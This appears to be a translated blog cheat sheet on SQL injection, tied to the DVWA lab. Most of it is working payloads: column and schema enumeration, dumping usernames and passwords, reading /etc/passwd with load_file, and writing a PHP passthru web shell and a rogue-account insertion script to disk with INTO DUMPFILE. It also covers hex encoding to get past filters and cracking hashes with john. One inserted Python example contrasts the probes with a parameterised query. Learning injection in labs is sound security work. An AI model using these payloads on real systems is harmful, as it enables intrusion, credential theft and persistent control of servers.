Web Penetration Testing - SQL Injection (continuously updated)

有些话、适合烂在心里, submitted 2020-02-02 02:40:55

SQL Injection

By variable type: numeric and string

By HTTP submission method: POST injection, GET injection and Cookie injection

By injection technique: boolean-based, UNION-based, stacked queries, error-based, time-based, inline

By database type:

SQL: Oracle, MySQL, MSSQL, Access, SQLite, PostgreSQL

NoSQL: MongoDB, Redis

Boolean-based

0x01 Check whether injection exists

1' and '1'='1
1' and '1'='2

Simplified versions:

1' and '1
1' and '0

Presumed server-side query: select xx from table where id='1'
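The TRUE/FALSE probe pair above, run as an added example (not code from the original post) against a constructed SQLite table in Python, next to a parameterised version of the same lookup to show why the probes stop telling the two apart; the table `items` and the names `vulnerable_lookup`, `safe_lookup` and `probe_differs` are chosen here.

```python
import sqlite3

# Constructed sample database standing in for the page's presumed
# "select xx from table where id='1'" target; not a real application.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("1", "first"), ("2", "second"), ("3", "third")])
    return conn

def vulnerable_lookup(conn, user_id):
    # The shape the post guesses at: user input pasted into the SQL string,
    # so a quote in the input ends the literal and the rest becomes SQL.
    sql = "select name from items where id='%s'" % user_id
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn, user_id):
    # Parameterised: the driver sends the value separately from the SQL,
    # so quotes and AND clauses inside it are only ever compared as data.
    sql = "select name from items where id=?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def probe_differs(lookup, conn, base="1"):
    # The 0x01 check: if the always-true and always-false probes return
    # different result sets, the input is being interpreted as SQL.
    true_probe = base + "' and '1'='1"
    false_probe = base + "' and '1'='2"
    return lookup(conn, true_probe) != lookup(conn, false_probe)

if __name__ == "__main__":
    conn = make_db()
    print("concatenated query, probes differ:", probe_differs(vulnerable_lookup, conn))  # True
    print("parameterised query, probes differ:", probe_differs(safe_lookup, conn))     # False
```

With the concatenated query the TRUE probe returns the row for id 1 and the FALSE probe returns nothing; with the parameterised query both probes return nothing, because no row has the literal probe string as its id.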

0x02 Determine the number of columns in the table

' order by 10 --+

Presumed server-side query: select xx from table where id=' ' order by 10 --'

0x03 Find which positions are displayed

' union select 1,2 --

A UNION query combines the results of several SELECT statements so they are displayed together

0x04 Replace the displayed positions with query expressions

' union select user(),@@datadir --

Query information from the information_schema metadata tables

0x001 List database names

' union select schema_name from information_schema.schemata --

0x002 List all tables in a database

' union select table_name from information_schema.tables where table_schema='...' --

0x003 List column names

' union select column_name from information_schema.columns where table_schema='...' and table_name='...' --

0x004 Read column contents

' union select user,password from dvwa.users --
' union select user,password from users --
' union select null,concat(user,0x3a,password) from users --

List all databases and their tables

' union select table_name,table_schema from information_schema.tables --

Count the number of tables in each database

' union select table_schema,count(*) from information_schema.tables group by table_schema --

Other uses of SQL injection

Reading files

union select load_file('/etc/passwd') --

Writing files

union select "<?php passthru($_GET['a']);?>" into dumpfile "/var/www/a.php" --
//Without an explicit path the file is written to the default directory
//If that directory is not writable, the shared /tmp directory can be used instead
//Usually has to be combined with a file-inclusion vulnerability

If the one-line payload is filtered, hex encoding can be used

cat a.php | xxd -ps | tr -d '\n'
//print a.php as hex with xxd; tr -d removes the trailing newline
//then inject in the URL: union select (0x<hex digits>) into dumpfile '<target path>' --
//if there is a comma before the opening parenthesis, a space must be added

Save query results to a local file

union select concat(user,0x3a,password) from users into outfile '/tmp/a.php' --

Global system variables

@@datadir    current data directory of the database

@@hostname    host name

@@VERSION    version

@@version_compile_os    current operating system version

ASCII code to character (used for bypassing filters)

char()

Concatenate strings

concat_ws(separator, string1, string2)

Compute a hash

md5()

Split a string on a specific delimiter

substring_index(query expression, "delimiter", which segment to return)

Cracking hash values

john, an open-source password cracker (on Linux)

john --format=raw-MD5 xxx.txt

#If the hashes have already been cracked it reports an error

One approach: write server-side code to the server in order to add an account

After writing the file, visit it, fill in the values on the page and submit

union select  '<?php if(isset($_POST["submit"]))  {  $userID = $_POST["userID"];  $first_name = $_POST["first_name"];  $last_name = $_POST["last_name"]; $username = $_POST["username"];  $avatar = $_POST["avatar"];  echo "userID: $userID<BR>";  echo "first_name: $first_name<BR>";  echo "last_name: $last_name<BR>";  echo "username: $username<BR>";  echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","","dvwa");  if (mysqli_connect_errno())  {  echo "Failed to connect to MySQL: " . mysqli_connect_error();  } else {  echo "Connected to database<BR>";  }  $password = "123";  $sql="insert into dvwa.users values  (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")";  if (mysqli_query($con,$sql))  {  echo "[Successful Insertion]: $sql";  } else {  echo "Error creating database: " . mysqli_error($con); } mysqli_close($con);  } ?>  <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">  <input type="text" name="userID" value="33">  <br>  <input type="text" name="first_name" value="fh"> <br>  <input type="text" name="last_name" value="y"> <br>  <input type="text" name="username" value="yfh"> <br> <input type="text" name="avatar" value="yfh!"> <br>  <input type="submit" name="submit" value="Submit Form"> <br>  </form> ' INTO DUMPFILE '/tmp/user.php' -- 
' union select null,'<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username = $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo "first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username: $username<BR>"; echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","","dvwa"); if (mysqli_connect_error()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to database<BR>"; } $password = "123"; $sql="insert into dvwa.users values (\\"$userID\\",\ \"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\ \")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID" value="33"><br> <input type="text" name="first_name" value="fh"><br> <input type="text" name="last_name" value="y"><br> <input type="text" name="username" value="yfh"><br> <input type="text" name="avatar" value="yfh!"><br> <input type="submit" name="submit" value="Submit Form"><br> </form>' INTO DUMPFILE '/tmp/user.php' -- 